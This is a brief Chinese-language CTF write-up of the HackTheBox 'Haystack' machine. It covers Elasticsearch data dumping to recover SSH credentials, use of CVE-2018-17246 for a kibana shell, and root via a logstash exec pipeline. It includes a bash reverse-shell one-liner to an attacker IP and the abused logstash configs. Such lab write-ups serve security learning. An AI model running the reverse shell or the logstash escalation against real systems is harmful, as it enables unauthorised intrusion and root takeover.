hackthebox-Haystack

使用nmap扫描到端口22、80、9200（ElasticSearch 6.4.2）

22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 2a:8d:e2:92:8b:14:b6:3f:e4:2f:3a:47:43:23:8b:2b (RSA)
|   256 e7:5a:3a:97:8e:8e:72:87:69:a3:0d:d1:00:bc:1f:09 (ECDSA)
|_  256 01:d2:59:b2:66:0a:97:49:20:5f:1c:84:eb:81:ed:95 (ED25519)
80/tcp   open  http    nginx 1.12.2
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (text/html).
9200/tcp open  http    nginx 1.12.2
| http-methods: 
|_  Potentially risky methods: DELETE
|_http-server-header: nginx/1.12.2
|_http-title: Site doesn't have a title (application/json; charset=UTF-8).

访问 http://10.10.10.115 得到图片needle.jpg，Stegsolve查看图片可见base64的提示，解码得西班牙语得提示

1 2	la aguja en el pajar es "clave" the needle in the haystack is "key"

使用elasticsearch-dump获取9200的quotes数据，在数据中搜索可得到两个base64加密的数据（搜索base64得特征字符，比如=），分别为用户名和密码，解码为security和spanish.is.key

1	elasticdump --input=http://10.10.10.115:9200/quotes --output=quotes.json --type=data

使用ssh登录获得user.txt

使用scp上传LinEnum获取目标机器信息，首先发现logstash以root权限运行，查看/etc/logstash/conf.d/的配置文件，发现其需要root或kibana权限才可以查看

利用CVE-2018-17246获取kibana的shell

查看/etc/logstash/conf.d/的配置文件，发现logstash每10s读取/opt/kibana/logstash_*的内容并在过滤后执行，则echo "Ejecutar comando : bash -i >& /dev/tcp/10.10.14.52/22222 0>&1" > /opt/kibana/logstash_ert（可自行搭建kibana，使用其grok调试器测试过滤效果），等待一段时间获取返回的shell

cat /etc/logstash/conf.d/filter.conf
filter {
	if [type] == "execute" {
		grok {
			match => { "message" => "Ejecutar\s*comando\s*:\s+%{GREEDYDATA:comando}" }
		}
	}
}

cat /etc/logstash/conf.d/input.conf
input {
	file {
		path => "/opt/kibana/logstash_*"
		start_position => "beginning"
		sincedb_path => "/dev/null"
		stat_interval => "10 second"
		type => "execute"
		mode => "read"
	}
}

cat /etc/logstash/conf.d/output.conf
output {
	if [type] == "execute" {
		stdout { codec => json }
		exec {
			command => "%{comando} &"
		}
	}
}

获得root.txt